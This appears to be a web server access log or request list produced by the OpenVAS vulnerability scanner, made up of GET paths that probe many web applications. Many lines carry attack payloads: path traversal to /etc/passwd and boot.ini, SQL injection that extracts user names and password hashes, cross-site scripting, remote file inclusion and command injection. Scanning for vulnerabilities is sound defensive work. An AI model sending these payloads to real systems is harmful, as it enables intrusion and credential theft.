 GET /dnet/team.rc5-72.php?showlang=../../../../../../../../../etc/passwd%00
 GET /doc/
 GET /doceboLms/index.php
 GET /docs/index.html
 GET /docusafe/main.asp
 GET /dokeos/index.php
 GET /dolibarr/index.php
 GET /dolphin/gzip_loader.php?file=../../../../../../../../../../../../../../../../etc/passwd
 GET /dolphin/index.php
 GET /dolphin/xml/get_list.php?dataType=ApplyChanges&iNumb=1&iIDcat=%27
 GET /domcfg.nsf
 GET /dotProject/index.php
 GET /dotclear/index.php
 GET /dotproject/index.php
 GET /download.aspx?FilePathAttach=/&FileNameAttach=web.config\.&OriginalAttachFileName=secretfile.txt
 GET /download.php?file=etc/passwd
 GET /download_manager/index.php
 GET /dpi/index.php
 GET /dpi11f/index.php
 GET /drupal/update.php
 GET /dsc/
 GET /dsweb/HomePage
 GET /dynpage/content/dynpage_load.php?file=/boot.ini
 GET /dynpage/content/dynpage_load.php?file=/etc/passwd
 GET /e107/e107_admin/admin.php/index.php
 GET /e107/e107_plugins/easyshop/easyshop.php?allcat
 GET /eFront/www/index.php
 GET /eTicket/license.txt
 GET /eXtplorer/extplorer.xml
 GET /ea-gBook/index.php?seite=0
 GET /ebbv/index.php
 GET /ebbv2/index.php
 GET /eclime/index.php
 GET /ecms/?view=home
 GET /ecoder/
 GET /editor/fckeditor.html
 GET /editor/samples/index.html
 GET /editwrx//wrx.cgi
 GET /efront/www/index.php
 GET /egroupware/login.php
 GET /elastix/index.php
 GET /elite/admin/login.php
 GET /elitecms/admin/login.php
 GET /em/console/logon/logon
 GET /emailpassword.tml
 GET /emo_virtual/index.php
 GET /en/StartingPoints
 GET /energine/
 GET /eng/start/about.htm
 GET /eng/status/statprn.htm
 GET /eng/status/statprn1.htm
 GET /eocms/index.php?theme=../../../../../../../../../etc/passwd%00
 GET /erp/
 GET /erp/AccountSections.php/%22%3E%3Cscript%3Ealert(/openvas-xss-test/);%3C/script%3E
 GET /erp/index.php?PathPrefix=../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat
 GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat1077681682
 GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
 GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini718200654
 GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
 GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini519857044
 GET /escortservice/show_profile.php?custid=1+and+1=0+union+select+1,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 
 GET /esev/sublink.php?langval=/etc/passwd
 GET /esev2/sublink.php?langval=/etc/passwd
 GET /eshop/index.php
 GET /etomite/index.php?id=w2znngbsng'
 GET /evalsmsi/evalsmsi.php
 GET /event/index3.do
 GET /eventum/htdocs/index.php
 GET /evision/modules/plain/adminpart/addplain.php?module=../../../../../../../../../../../../etc/passwd%00
 GET /examples/jsp/source.jsp??
 GET /examples/servlet/TroubleShooter
 GET /exchweb/bin/auth/owalogon.asp?url=http://12345678910
 GET /exponent/index.php
 GET /ext/calendar.php
 GET /eyeOS/desktop.php
 GET /eyeos/index.php
 GET /ez/showcategory.php?cid=-101+union+select+12345678987654321,12345678987654321,3,4,5--
 GET /facil-cms/modules.php?modload=Albums&op=photo&id=-1+UNION+SELECT+1,2,3,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374%20--
 GET /faethon/index.php
 GET /faq/index.php
 GET /favicon.ico
 GET /fcgi-bin/echo?foo=
 GET /fcms/index.php
 GET /feed.php
 GET /fengoffice/public/tools/index.php
 GET /fhm/index.php
 GET /fileexplorer/index.php?action=login
 GET /filemanager/content.php?get_action=display_doc&doc_file=CREDITS
 GET /filemanager/index.php
 GET /firestats/tools.php?file_id=reset_password
 GET /flash/README.txt
 GET /flashlight/README.txt
 GET /flatchat/index.php
 GET /flatpress/index.php
 GET /flex2gateway/
 GET /flsummary.pl
 GET /fm.php
 GET /foo.jsp?param=.jsp
 GET /formmail/FormMail.pl
 GET /formmail/formmail.pl
 GET /forms/lservlet
 GET /forum.php
 GET /forum/
 GET /forum/admin.php
 GET /forum/index.php
 GET /forum/index.php?page=profile&id=%27%20or%20%27a%27=%27a
 GET /forum/login.php
 GET /forum/view_user.php?list=1&letter=&sort_by='select
 GET /forum/wcf/acp/dereferrer.php?url=javascript:alert(document.cookie);
 GET /foswiki/Main/WebHome
 GET /foswiki/bin/view/foswiki/WebHome
 GET /foundation/viewheadline.php?id=-9%27%20union%20select%201,2,3,4,5,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20wp_users--+
 GET /fpws/index.php
 GET /framework/index.php
 GET /freepbx/admin/config.php
 GET /freeway/admin/login.php
 GET /freewebshop/index.php
 GET /fretsweb/charts.php?language=../../../../../../../../../etc/passwd%00A
 GET /frontaccount/index.php
 GET /frontaccount/index.php 
 GET /fsms/fsmsh.dll?FSMSCommand=GetVersion
 GET /ftp/index.php
 GET /fuzzylime/_cms303/docs/readme.txt
 GET /galilery/index.php?pg=1&d=../../../../../../../../../../../../../../../../../../
 GET /gallery/_conf/?action=delsettings&group=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc/passwd%2500.jpg&picdir=Sample_Gallery&what=descriptions
 GET /gallery/gallery.php?repertoire=../../../../../../../../../etc/passwd%00
 GET /gallery/index.php
 GET /gallery/styles.php?toroot=/etc/passwd%00
 GET /gallo/core/includes/gfw_smarty.php?config[gfwroot]=../../../../../../../../../boot.ini%00
 GET /gallo/core/includes/gfw_smarty.php?config[gfwroot]=../../../../../../../../../etc/passwd%00
 GET /ganglia/index.php
 GET /gateway.aspx
 GET /gb/add.php?lang=../../../../../../../../../etc/passwd%00
 GET /gcards/index.php?setLang=gcards_dir_transversal.nasl&lang[gcards_dir_transversal.nasl][file]=../../../../../../../../../../../../etc/passwd
 GET /gdl/download.php?id=-1+union+select+1,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374
 GET /gdl42/download.php?id=-1+union+select+1,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374
 GET /geccBB/index.php
 GET /geccBBlite/index.php
 GET /geneald/Index2.php
 GET /general/login.php
 GET /general/status.html
 GET /geoserver/web/?wicket:bookmarkablePage=:org.geoserver.web.AboutGeoServerPage
 GET /geoserver/welcome.do
 GET /get_flash_info.php?ver=1'
 GET /gimtel/html/affich.php?base=http://xxx.xxxxxx./
 GET /git/
 GET /gitlist/
 GET /glFusion/index.php
 GET /glpi/index.php
 GET /gnat-tgp/gnat/admin/index.php
 GET /gnew/news/index.php
 GET /go/about.php
 GET /grades/index.php?GLOBALS[SKIN]=../../../../../../../../../etc/passwd%00
 GET /gravity/index.php
 GET /greymatter/gm.cgi
 GET /gsdl/etc/users.gdb
 GET /guestbook/add.php?lang=../../../../../../../../../etc/passwd%00
 GET /guestbook/index.php?start=
 GET /gw/webacc?User.interface=/../webacc/wml
 GET /gwadmin-console/login.jsp
 GET /habari/
 GET /hdjobq.htm
 GET /hdstat.htm
 GET /header.php
 GET /headhome.htm
 GET /help/contents.htm
 GET /help/index.html
 GET /help/language/en/text.php/
 GET /helpdesk/index.php
 GET /helpdesk/language/en/text.php/
 GET /helpdesk/signin.php
 GET /hero/index.php
 GET /hero_os/index.php
 GET /hesk/index.php
 GET /hesk/language/en/text.php/
 GET /home
 GET /home.asp
 GET /home.html
 GET /home/index.php
 GET /horde/chora/horde/services/help/?module=chora&show=about
 GET /horde/gollem/index.php
 GET /hostingmanager/index.php
 GET /hp/device/
 GET /hpmpa/home/
 GET /htdocs/
 GET /htdocs/index.php
 GET /htdocs/login.php
 GET /iboutique/index.php
 GET /idb/index.php
 GET /idoit/index.php
 GET /ignition/comment.php?blog=../../../../../../../../../etc/passwd%00
 GET /ignition/page.php?page=../../../../../../../../../etc/passwd%00
 GET /ileys/index.php
 GET /images/gallery.php?repertoire=../../../../../../../../../etc/passwd%00
 GET /images/report.php?img_id=%22%3E%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E
 GET /imageview/admin/index.php?page=unexisting../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET /imageview6/admin/index.php?page=unexisting../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET /imp/
 GET /imprescms/
 GET /impress/
 GET /impresspages/
 GET /includer/includer.cgi?template=includer_rcmdexec.nasl
 GET /index.cgi
 GET /index.hsp?login=
 GET /index.htm
 GET /index.htm?cat=info&page=printerInfo
 GET /index.html
 GET /index.html?urlmaskfilter=
 GET /index.jsp
 GET /index.php
 GET /index.php.
 GET /index.php/Main_Page
 GET /index.php?act=login
 GET /index.php?action=login.index&host=0
 GET /index.php?js=0ctest=1&test=1&ctest=1
 GET /index.php?owa_do=base.loginForm
 GET /index.php?page=../../../../../../../../../../../../../../../../../WINNT/system32/ipconfig.exe
 GET /index.php?page=../../../../../../../../../../../../../../../etc/passwd
 GET /index.php?page=master
 GET /index.pl
 GET /index_en.jsp
 GET /index_top.htm
 GET /info_deviceStatus.html
 GET /info_deviceStatus.html?
 GET /info_deviceStatus.html?tab=Status
 GET /infusions/book_panel/books.php?&bookid=-1+union+select+1,2,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,4,5,6--
 GET /innoedit/innoedit.cgi?download=;id|
 GET /inserter.cgi?/etc/passwd
 GET /install/index.php
 GET /interface/login/login_title.php
 GET /interleave/index.php
 GET /interscan/cgi-bin/FtpSave.dll?I'm%20Here
 GET /intramaps75/ApplicationEngine//
 GET /intramaps75/applicationengine/
 GET /inverseflow/ticketview.php?email=%22%3E%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E&id=1
 GET /invoice/index.php
 GET /invoker/EJBInvokerServlet
 GET /invoker/JMXInvokerServlet
 GET /io/newfile.txt
 GET /ioncube/loader-wizard.php?page=phpinfo
 GET /irokez/ru/
 GET /ispcp/index.php
 GET /ispworker/module/biz/index.php
 GET /jaf/module/forum/main.php?website=../../../../../../../../../etc/passwd%00
 GET /jag/guestbook.php
 GET /jamwiki/en/StartingPoints
 GET /jaws/index.php
 GET /jenkins/
 GET /jobs/browse.php?pk=-1%20union%20select%201234567,2--
 GET /joomla/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1%27UNION%20ALL%20SELECT%201,2,3,4,5,concat(%27username:%20%27,username),concat(%27password:%20%27,%20password),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20jos_user 
 GET /joomla/index.php?option=com_joomradio&page=show_video&id=-1%20UNION%20SELECT%20user%28%29,concat%28username,0x3a,password%29,user%28%29,user%28%29,user%28%29,user%28%29,user%28%29%20FROM%20jos_users--
 GET /joostina/index.php?option=com_search&searchword=xss&ordering=%22%20onmouseover=alert(document.cookie)%20style=position:fixed;top:0;left:0;width:100%;height:100%;%22
 GET /jv/www/index.php?p=../../../../../../../../../..//etc/passwd%00
 GET /jv/www/index.php?p=../../../../../../../../../../boot.ini%00
 GET /kb/a_viewusers.php?s=1+UNION+SELECT+load_file(0x2f6574632f706173737764),null,null,null,null,null,null+limit+0
 GET /kb/index.php
 GET /kb/index.php?page=http://xxxxxxxxxxxxx/openvas
 GET /kbp/index.php
 GET /kleinanzeigen/index.php3?id=http://xx./
 GET /kos2/changelog.txt
 GET /kusabax/animation.php?board=b&id=1">
 GET /labwiki/index.php?from=";>&help=true&page=What_is_wiki
 GET /lasernet/index.php?id=-1'%20UNION%20SELECT%201,2,3,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,5,6,7,8,9,10,11,12,13--+
 GET /lcgi
 GET /lcms/index.php
 GET /lcms/index.php?system=../../../../../../../../../etc/passwd%00
 GET /ldap/templates/login.php
 GET /ledger/login.pl
 GET /lightneasy/LightNEasy.php?do=login
 GET /lightneasy/index.php
 GET /limesurvey/index.php
 GET /linkSpheric/admin/index.php
 GET /linpha/index.php
 GET /listserv/wa.exe?SHOWTPL=
 GET /livezilla/index.php
 GET /lm_starmail_paidmail/index.php
 GET /local.html
 GET /localclassifieds//classifieds/Site_Admin/admin.php 
 GET /log/index.php
 GET /loganalyzer/index.php
 GET /login
 GET /login.action
 GET /login.asp
 GET /login.aspx
 GET /login.cgi
 GET /login.cgi?login=OpenVAS">
 GET /login.htm
 GET /login.html
 GET /login.jsp
 GET /login.lua
 GET /login.php
 GET /login.pl
 GET /login/
 GET /login/index.php
 GET /login/login.html
 GET /login_form.php
 GET /login_up.php3
 GET /logon.php
 GET /logon.php?redirect=index.php&nouser=1
 GET /logon_senha.asp
 GET /lokomedia/downlot.php?file=../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
 GET /lotuscms/index.php
 GET /lovecms/system/admin/modules.php?install=../../../../../../../../../etc/passwd%00
 GET /lua/onlinehelp/LUHelp0002.html
 GET /luxcal/index.php
 GET /mVGlf3XrVKka.html
 GET /mahara/htdocs/index.php
 GET /mail/Mondo/lang/sys/login.aspx
 GET /mail/accounts/inc/include.php?language=0&lang_settings[0][1]=http://xxxxxxxxxxxxxxx/openvas/
 GET /mail/admin/index.php
 GET /mail/inc/function.php
 GET /mail/index.php/admin/
 GET /mail/lists/admin/?page=about
 GET /mailer/admin/index.php
 GET /mailgust/index.php
 GET /mailman/listinfo
 GET /main.cgi?next_file=/etc/passwd
 GET /main.html
 GET /main.php
 GET /mambo/index.php
 GET /manager/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2Fpasswd
 GET /manager/html
 GET /manager/index.php
 GET /mantis/login_page.php
 GET /manx/admin/login.php/"onmouseover=alert("openvas-xss-test")>
 GET /map/admin/updatelist.php?filepath=../includes/settings.php
 GET /mcms/index.php?lng=../../../../../../../../../etc/passwd%00
 GET /md/index.php
 GET /mdpro/index.php
 GET /media/plugins/system/shadowbox/min/index.php?g=sb&ad=base&lan=en&play=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd%00
 GET /medias/?context=bWFzdGVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkfC0
 GET /megafilemanager/index.php
 GET /menu.jsp
 GET /microcms/index.php?page=../../../../../../../../../../../../../../../../boot.ini%00
 GET /microcms/index.php?page=../../../../../../../../../../../../../../../../etc/passwd%00
 GET /minibb/bb_func_txt.php?pathToFiles=/etc/passwd%00
 GET /minicms/index.php
 GET /moadmin.php?db=admin&action=listRows&collection=fdsa&find=array();phpinfo();
 GET /moadmin//moadmin.php?db=admin&action=listRows&collection=fdsa&find=array();phpinfo();
 GET /moadmin//wu-moadmin.php?db=admin&action=listRows&collection=fdsa&find=array();phpinfo();
 GET /modx/manager/index.php
 GET /modx/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=/etc/passwd%00
 GET /mollify/backend/plugin/Registration/index.php?confirm=%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E 
 GET /monitoring/index.php
 GET /moniwiki/wiki.php
 GET /moodle/index.php
 GET /moziloCMS/index.php
 GET /mp3/andromeda.php
 GET /mrbs1261/web/help.php
 GET /msd/index.php
 GET /mt/mt.cgi
 GET /multicms/index.php?lng=../../../../../../../../../etc/passwd%00
 GET /mundimail/admin/index.php
 GET /music/andromeda.php
 GET /musicbox/index.php
 GET /mve/help/en/inventory/am_about.html
 GET /mybackup/down.php?filename=../../../../../../../../../../../../etc/passwd%00
 GET /mybb/index.php
 GET /myhabari/
 GET /mymsg/Login.php
 GET /mynews/includes/tiny_mce/plugins/filemanager/classes/FileManager/FileSystems/ZipFileImpl.php?basepath=/etc/passwd%00
 GET /myserver/index.html
 GET /nagios/main.php
 GET /nagiosxi/login.php
 GET /nakid/index.php
 GET /nameko.php
 GET /natterchat/home.asp
 GET /netautor/napro4/index.php
 GET /netflow/jspui/NetworkSnapShot.jsp
 GET /netjukebox/message.php?skin=">
 GET /netoffice/general/login.php
 GET /netpet/index.php
 GET /netpet/netpet/index.php
 GET /netrisk/index.php
 GET /news.php
 GET /news/includes/tiny_mce/plugins/filemanager/classes/FileManager/FileSystems/ZipFileImpl.php?basepath=/etc/passwd%00
 GET /news/index.php
 GET /newscoop/admin/password_check_token.php?f_email=1&token=%22%3E%3Cscript%3Ealert%28/openvas-xss-test/%29;%3C/script%3E
 GET /newsportal/post.php?newsgroups=
 GET /newuser
 GET /nforum/showtheme.php?id=-1%27%20UNION%20ALL%20SELECT%201,2,CONCAT(name,%200x3a,%20passwd_hash),NULL,5,6,7%20FROM%20users%23
 GET /nidp/app
 GET /niet1179977403.
 GET /nodatabase/LightNEasy.php?do=login
 GET /nodatabase/index.php
 GET /nodesforum/index.php
 GET /nonexistent_please_dont_exist
 GET /nosuchfile-10303-10310.php3
 GET /note.txt?F_notini=&T_note=&nomentreprise=blah&filenote=../../windows/win.ini
 GET /novaboard/index.php
 GET /np_handler/
 GET /nps/servlet/webacc?taskId=dev.Empty&merge=fw.About
 GET /nqt/nqt.php?target=127.0.0.1&queryType=all&portNum=foobar%3Cscript%3Efoo%3C/script%3E
 GET /nubuilder/productionnu2/fileuploader.php?dir=../../../../../../../../../../../boot.ini%00
 GET /nubuilder/productionnu2/fileuploader.php?dir=../../../../../../../../../../../etc/passwd%00
 GET /nubuilder/productionnu2/report.php?StartingDirectory=../../../../../../../../../../../boot.ini%00
 GET /nubuilder/productionnu2/report.php?StartingDirectory=../../../../../../../../../../../etc/passwd%00
 GET /nuke/index.php
 GET /null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
 GET /null.htw?CiWebHitsFile=/iisstart.asp%20&CiRestriction=none&CiHiliteType=Full
 GET /null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full
 GET /null.htw?CiWebHitsFile=/localstart.asp%20&CiRestriction=none&CiHiliteType=Full
 GET /obm.php
 GET /obm/obm.php
 GET /oc-admin/index.php
 GET /ocportal/index.php
 GET /ocsreports/index.php
 GET /ojspdemos/index.html
 GET /ona/
 GET /onlinegrades/index.php?GLOBALS[SKIN]=../../../../../../../../../etc/passwd%00
 GET /ooz/index.php
 GET /oozv1657/common/login.php?default_language=/../../supporter/timer.js%00
 GET /opac-main.pl
 GET /open-audit/index.php
 GET /open-realty/index.php
 GET /open_audit/index.php
 GET /openaudit/index.php
 GET /openbb/board.php?FID=%3Cscript%3Efoo%3C/script%3E
 GET /opencart/index.php
 GET /opendb/login.php
 GET /openengine/cms/website.php?id=/de/index.htm&admin=login
 GET /openforum/index.php
 GET /openmairie_Tel/scr/soustab.php?dsn[phptype]=../../../../../../../../../../../boot.ini%00
 GET /openmairie_Tel/scr/soustab.php?dsn[phptype]=../../../../../../../../../../../etc/passwd%00
 GET /openmairie_stock/scr/soustab.php?dsn[phptype]=../../../../../../../../../../../boot.ini%00
 GET /openmairie_stock/scr/soustab.php?dsn[phptype]=../../../../../../../../../../../etc/passwd%00
 GET /openpro/login.php
 GET /openrealty/index.php
 GET /opensso/UI/Login.jsp
 GET /openstock/scr/soustab.php?dsn[phptype]=../../../../../../../../../../../boot.ini%00
 GET /openstock/scr/soustab.php?dsn[phptype]=../../../../../../../../../../../etc/passwd%00
 GET /opentel/scr/soustab.php?dsn[phptype]=../../../../../../../../../../../boot.ini%00
 GET /opentel/scr/soustab.php?dsn[phptype]=../../../../../../../../../../../etc/passwd%00
 GET /openvas345678.html
 GET /openx/index.php
 GET /openx/www/admin/index.php
 GET /operations_gui/
 GET /opnfrm/index.php
 GET /opt/index.php?OPT_Session= OpenVAS_Req
 GET /orangehrm/login.php
 GET /orbis/admin/login.php
 GET /organizer/view.php?id=-1+union+select+0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,2,3,4,5,6,7,8,9,10+from+test_category&mytable=test_category
 GET /os/index.php
 GET /osc/index.php
 GET /osclass//index.php
 GET /osclass/oc-admin/index.php
 GET /oss5/lib/browsefiles.php?dir=/etc
 GET /oss5/lib/browsefolders.php?dir=/etc
 GET /oss6/lib/browsefiles.php?dir=/etc
 GET /oss6/lib/browsefolders.php?dir=/etc
 GET /oss7/lib/browsefiles.php?dir=/etc
 GET /oss7/lib/browsefolders.php?dir=/etc
 GET /ossim/session/login.php
 GET /ou/gen/obj/collectivite.class.php?path_om=/boot.ini%00
 GET /ou/gen/obj/collectivite.class.php?path_om=/etc/passwd%00
 GET /ourwebftp/index.php
 GET /overlook/src/login.php
 GET /owa/auth/logon.aspx
 GET /ows-bin/perlidlc.bat
 GET /oxid-eshop/index.php
 GET /oxid/index.php
 GET /page.php?action=view&id=1
 GET /papoo/index.php/">
 GET /parser/parser.php?file=
 GET /parsp/index.php
 GET /passwiki/passwiki.php
 GET /passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
 GET /pbb/index.php
 GET /pds/index.php
 GET /petition/signing_system-admin/index.php
 GET /pfile/kommentar.php?filecat=">&fileid=0
 GET /phlymail/phlymail/index.php
 GET /photo/index.php
 GET /photopost/index.php
 GET /photos/index.php
 GET /photos/search.php?dosearch=true&query=">
 GET /php-calendar/index.php
 GET /php-charts/charts/wizard/url.php?${phpinfo()}=1
 GET /php-charts/wizard/index.php?type=';phpinfo();//
 GET /php-member-login/login.php
 GET /php-nuke/html/index.php
 GET /php-nuke/index.php
 GET /php/login.php
 GET /php/mytutos.php
 GET /php/php.exe?c:\winnt\win.ini
 GET /phpAlbumnet/main.php
 GET /phpBazar/index.php
 GET /phpDatingClub/index.php
 GET /phpMyDirectory/index.php
 GET /phpMyRecipes/index.php
 GET /phpNagios/index.php
 GET /phpPgAdmin/intro.php
 GET /phpads/admin.php
 GET /phpalbum/index.php
 GET /phpalbum/main.php
 GET /phpauction/admin/admin.php
 GET /phpauction/viewfaqs.php?cat=-1+union+select+1
 GET /phpauctions/viewfaqs.php?cat=-1+union+select+1
 GET /phpb2b/index.php
 GET /phpbiblesearch/bible.php
 GET /phpbt/index.php
 GET /phpcdb/firstvisit.php?lang_global=../../../../../../../../../etc/passwd%00
 GET /phpcom/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25%22%20UNION%20ALL%20SELECT%201,2,3,4,CONCAT(nick,%200x3a,%20pwd),6%20FROM%20com_users%23
 GET /phpcoupon/index.php?page=viewbus&bus='
 GET /phpdocumentor/docbuilder/top.php
 GET /phpfinance/index.php
 GET /phpfootball/filter.php?dbtable=Accounts&dbfield=Password
 GET /phpforum/index.php
 GET /phpgraphy/themes/default/header.inc.php?theme_dir=%22%3E%3Cscript%3Ealert%28/openvas-xss-test/%29;%3C/script%3E
 GET /phpgroupware/login.php
 GET /phpicalendar/print.php
 GET /phpinfo.php
 GET /phpkick/index.php
 GET /phplinkadmin//edlink.php?linkid=-1%27%20union%20all%20select%201,2,3,4,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374%27--
 GET /phplistpro/config.php?returnpath=/etc/passwd%00
 GET /phplive/index.php
 GET /phpmoadmin//moadmin.php?db=admin&action=listRows&collection=fdsa&find=array();phpinfo();
 GET /phpmoadmin//wu-moadmin.php?db=admin&action=listRows&collection=fdsa&find=array();phpinfo();
 GET /phpmv2/index.php
 GET /phpmyagenda/agenda.php3
 GET /phpmydirectory/index.php
 GET /phpmygallery/_conf/?action=delsettings&group=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc/passwd%2500.jpg&picdir=Sample_Gallery&what=descriptions
 GET /phpnagios/index.php
 GET /phpnuke/html/index.php
 GET /phportfolio/index.php
 GET /phprecipebook/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,+0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,4,5,6,7+from+security_users--
 GET /phprocketaddin/?page=../../../../../../../../../../../../../../../WINNT/system32/ipconfig.exe
 GET /phprocketaddin/?page=../../../../../../../../../../../../../../../etc/passwd
 GET /phpsurveyor/admin/admin.php?sid=0'
 GET /phptax/index.php
 GET /phpticket/index.php
 GET /phptraverser/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=../../../../../../../../../../../../../boot.ini%00
 GET /phptraverser/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=../../../../../../../../../../../../../etc/passwd%00
 GET /phptt/index.php
 GET /phpunity.newsmanager/tmpl/news_main.htm
 GET /phpvideopro/medialist.php
 GET /phpwebsite/index.php?module=users&action=user&command=login_page
 GET /phpwebthings/core/editor.php?editor_insert_bottom=/etc/passwd
 GET /phpwebthings/forum.php?forum=-1%20UNION%20SELECT%20null%2c123456%2cnull%2cnull%2cnull%2cnull%2f*
 GET /phpwiki/
 GET /phreeBooks/index.php
 GET /pivot/modules/module_db.php?pivot_path=http://xxxxxxxxxx/
 GET /pivot/pivot/index.php
 GET /pivotx/pivotx/modules/module_image.php?image=
 GET /piwigo/
 GET /piwigo/install.php?dl=/../../../../../../../../../../../../../../etc/passwd
 GET /piwik/index.php
 GET /platform/index_de.jsp
 GET /playsms/plugin/themes/default/page_forgot.php?apps_path[themes]=/etc/passwd%00
 GET /pligg/index.php
 GET /plone/index.php
 GET /pls/portal/PORTAL_DEMO.ORG_CHART.SHOW
 GET /plugins/system/shadowbox/min/index.php?g=sb&ad=base&lan=en&play=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd%00
 GET /plume/index.php
 GET /plus/index.php
 GET /pmd/index.php
 GET /podcast/index.php
 GET /portal/ajaxp_backend.php?page=-1+union+select+1,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7--
 GET /portal/includes/esqueletos/skel_null.php?ABTPV_BLOQUE_CENTRAL=/etc/passwd
 GET /portal/index.php
 GET /portix/print.php?page=../../../../../../../../../etc/passwd
 GET /posh/login.php
 GET /posh/portal/login.php?message=XSS%20Catched%20!%22))%3C/script%3E%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E
 GET /postnuke/docs/CHANGELOG
 GET /postnuke/docs/distribution/tour_page1.htm
 GET /postnuke/index.php
 GET /postnuke/themes/SeaBreeze/style/style.css
 GET /ppim/Readme.txt
 GET /pppblog/search.php?q=
 GET /prado/
 GET /preauth/login.cgi
 GET /printer/main.html
 GET /prochatrooms/index.php
 GET /production//application/configs/application.ini
 GET /products.php
 GET /profile/index.php
 GET /projects/TotalCalendar/index.php
 GET /proquiz/admin/index.php
 GET /prowiki/wiki.cgi
 GET /psconsole/faces/common/ProductVersion.jsp
 GET /public.pl
 GET /public/code/cp_dpage.php
 GET /pulse/index.php??p=../../../../../../../../../etc/passwd%00
 GET /pulsecms/index.php??p=../../../../../../../../../etc/passwd%00
 GET /punbb/index.php
 GET /puttest1.html
 GET /quickpoll/index.php?fct=preview&p=../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET /quixplorer/index.php
 GET /rails/info/properties/
 GET /rcblog/index.php?post=../config/password
 GET /realestate/findagent.php?country1=%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E
 GET /realestate/index.php
 GET /recipedb/beerxml.php?r=null%20union%20select%201,2,3,4,5,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,7,8,9,10,11
 GET /recipes/beerxml.php?r=null%20union%20select%201,2,3,4,5,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,7,8,9,10,11
 GET /redaxscript
 GET /redaxscript/index.php
 GET /relcms/index.php
 GET /released.html
 GET /reos/jobs.php?lang=../../../../../../../../../etc/passwd%00
 GET /resin-admin/
 GET /resources/index.php
 GET /revive-adserver/www/admin/index.php
 GET /revive_adserver/www/admin/index.php
 GET /revsense/index.php?section=&action=login
 GET /rezervi/left.php
 GET /rhinos/admin/lib/gradient/gradient.php?tam=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd%00
 GET /rips/windows/function.php?file=/etc/passwd&start=0&end=10
 GET /robohelp/admin/login.jsp
 GET /robot.txt
 GET /robots.txt
 GET /roller/login.rol
 GET /roomjuice/display.php?filename=
 GET /rt/index.html
 GET /rtl/about.lsp
 GET /rtm.log
 GET /rtwebalbum/admin.php
 GET /ruubikcms/extra/image.php?f=../../../../../../../../../etc/passwd
 GET /s40/index.php
 GET /sNews/index.php
 GET /sahana/index.php?mod=home&act=about
 GET /sampler/
 GET /samples/index.html
 GET /sandbox/index.php
 GET /sapid/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=/etc/passwd%00
 GET /sapmc/sapmc.html
 GET /script/index.php
 GET /scripts
 GET /scripts/
 GET /scripts/.svn/entries
 GET /scripts/404.php?url=1%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E
 GET /scripts/?p=
 GET /scripts/?page=shop/cart&func=cartAdd&product_id='
 GET /scripts/?upload_to=
 GET /scripts/AccountSections.php/%22%3E%3Cscript%3Ealert(/openvas-xss-test/);%3C/script%3E
 GET /scripts/ApplicationEngine//
 GET /scripts/CFIDE/probe.cfm
 GET /scripts/Config/diff.php?file=;id&new=1&old=2
 GET /scripts/Count.cgi?align=topcenter
 GET /scripts/FormMail.pl
 GET /scripts/HomePage
